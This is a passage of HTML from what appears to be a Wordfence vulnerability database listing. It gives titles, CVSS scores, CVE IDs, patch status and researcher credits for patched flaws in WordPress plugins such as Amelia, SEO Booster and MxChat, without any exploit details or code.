						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57425" target="_blank" rel="noopener noreferrer">							CVE-2026-57425						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pay-wp" target="_blank" rel="noopener">Autopay dla WooCommerce</a> <span class="wfvr-software-slug">[pay-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/averon-averenkov-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5587b026daa672243d4903dbbc258039.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5587b026daa672243d4903dbbc258039"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/averon-averenkov-2" target="_blank" rel="noopener">Averon Averenkov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/20203ff8-34ff-496c-b51c-8cad3ded8bf7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70ed8cfb-845c-4015-a855-69f6577ccad9" target="_blank" rel="noopener">Easy Appointments &lt;= 3.12.27 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61946" target="_blank" rel="noopener noreferrer">							CVE-2026-61946						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daniel-wade-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1216c9552b2d98fdc5883f41c8074c3b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1216c9552b2d98fdc5883f41c8074c3b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daniel-wade-2" target="_blank" rel="noopener">Daniel Wade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70ed8cfb-845c-4015-a855-69f6577ccad9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1208ac78-4a56-4daa-b935-d579f07f8e8e" target="_blank" rel="noopener">Fense Proxy &amp; VPN Blocker &lt;= 3.0.1 &#8211; Missing Authorization to Unauthenticated Plugin Option/Transient Deletion via fense_bpvt_save_settings AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-8616" target="_blank" rel="noopener noreferrer">							CVE-2026-8616						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fense-block-vpn-proxy" target="_blank" rel="noopener">Fense Proxy &amp; VPN Blocker</a> <span class="wfvr-software-slug">[fense-block-vpn-proxy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1208ac78-4a56-4daa-b935-d579f07f8e8e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8b67557c-785f-433b-8e5b-fcc0bda14892" target="_blank" rel="noopener">FoodBook Lite &lt;= 1.5.6 &#8211; Missing Authorization to Unauthenticated User Registration via &#8216;registration_action&#8217; AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11802" target="_blank" rel="noopener noreferrer">							CVE-2026-11802						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/foodbook-light-online-food-ordering-system" target="_blank" rel="noopener">FoodBook Lite – Online Food Ordering System</a> <span class="wfvr-software-slug">[foodbook-light-online-food-ordering-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/eason" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/69f62ba6184391399971bbf0e46fbede.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69f62ba6184391399971bbf0e46fbede"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/eason" target="_blank" rel="noopener">Eason</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8b67557c-785f-433b-8e5b-fcc0bda14892" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39a410a6-ce8b-498c-855c-8cbb7d4b875b" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely &lt;= 6.2.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61943" target="_blank" rel="noopener noreferrer">							CVE-2026-61943						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely</a> <span class="wfvr-software-slug">[wpdm-premium-packages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39a410a6-ce8b-498c-855c-8cbb7d4b875b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dc36ee53-81a9-416e-8e74-31d9c8802d6c" target="_blank" rel="noopener">WPBot &lt;= 8.5.6 &#8211; Missing Authorization to Unauthenticated Arbitrary Chat Session Deletion via &#8216;userid&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15106" target="_blank" rel="noopener noreferrer">							CVE-2026-15106						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">WPBot – AI ChatBot for Live Support, Lead Generation, AI Services</a> <span class="wfvr-software-slug">[chatbot]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dc36ee53-81a9-416e-8e74-31d9c8802d6c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3a58e68-d1f1-4d4f-ac64-bc6cb7dbdbfc" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia &lt;= 2.4.3 &#8211; Authenticated (Custom+) SQL Injection via Customer Import</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14782" target="_blank" rel="noopener noreferrer">							CVE-2026-14782						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/f0dh1l" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fe1c5e7ab8d1c6848c14c7ce93fe2256.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fe1c5e7ab8d1c6848c14c7ce93fe2256"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/f0dh1l" target="_blank" rel="noopener">F0DH1L</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3a58e68-d1f1-4d4f-ac64-bc6cb7dbdbfc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01a52285-2d0c-4b29-8dab-18a3e3640e5c" target="_blank" rel="noopener">Kirki &lt;= 6.0.13 &#8211; Authenticated (Editor+) Path Traversal to Arbitrary Directory Deletion via &#8216;family&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15457" target="_blank" rel="noopener noreferrer">							CVE-2026-15457						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01a52285-2d0c-4b29-8dab-18a3e3640e5c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/59f622ee-eccf-4b5b-8fa0-93a4405eb1e9" target="_blank" rel="noopener">SEO Booster &lt;= 7.3.1 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;orderby&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15445" target="_blank" rel="noopener noreferrer">							CVE-2026-15445						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-booster" target="_blank" rel="noopener">SEO Booster</a> <span class="wfvr-software-slug">[seo-booster]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/59f622ee-eccf-4b5b-8fa0-93a4405eb1e9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ffcf8071-89be-484c-9b6a-8b08e12cf100" target="_blank" rel="noopener">SEO Booster &lt;= 7.3.1 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;sort_field&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15458" target="_blank" rel="noopener noreferrer">							CVE-2026-15458						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-booster" target="_blank" rel="noopener">SEO Booster</a> <span class="wfvr-software-slug">[seo-booster]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ffcf8071-89be-484c-9b6a-8b08e12cf100" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39d325d4-073c-47b6-8ea4-30637417f0d7" target="_blank" rel="noopener">WP Bulk Delete &lt;= 1.4.2 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;delete_user_roles&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15727" target="_blank" rel="noopener noreferrer">							CVE-2026-15727						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-bulk-delete" target="_blank" rel="noopener">WP Bulk Delete</a> <span class="wfvr-software-slug">[wp-bulk-delete]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39d325d4-073c-47b6-8ea4-30637417f0d7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0d38788-5f90-4ab1-8df1-1c67c1052e6d" target="_blank" rel="noopener">WP TripAdvisor Review Slider &lt;= 14.6 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;filtersource&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15651" target="_blank" rel="noopener noreferrer">							CVE-2026-15651						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-tripadvisor-review-slider" target="_blank" rel="noopener">WP TripAdvisor Review Slider</a> <span class="wfvr-software-slug">[wp-tripadvisor-review-slider]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0d38788-5f90-4ab1-8df1-1c67c1052e6d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/120bc64f-05ec-41e7-9ed4-d88014f4a3ea" target="_blank" rel="noopener">MxChat &lt;= 3.2.10 &#8211; Authenticated (Admin+) Stored Cross-Site Scripting via &#8216;intro_message&#8217; Setting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13005" target="_blank" rel="noopener noreferrer">							CVE-2026-13005						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mxchat-basic" target="_blank" rel="noopener">MxChat – AI Chatbot &amp; Content Generation for WordPress</a> <span class="wfvr-software-slug">[mxchat-basic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/120bc64f-05ec-41e7-9ed4-d88014f4a3ea" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b2371b84-bb56-4e5d-afce-cd33f2ee9316" target="_blank" rel="noopener">SysBasics Customize My Account for WooCommerce &lt;= 4.4.14 &#8211; Authenticated (Shop Manager+) Stored Cross-Site Scripting via &#8216;row_type&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15324" target="_blank" rel="noopener noreferrer">							CVE-2026-15324						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/customize-my-account-for-woocommerce" target="_blank" rel="noopener">SysBasics Customize My Account for WooCommerce – Live My Account Customizer</a> <span class="wfvr-software-slug">[customize-my-account-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b2371b84-bb56-4e5d-afce-cd33f2ee9316" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e9b094a-29ba-4be3-9033-fd915fae1820" target="_blank" rel="noopener">Academy LMS &lt;= 3.8.0 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference via &#8216;user_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
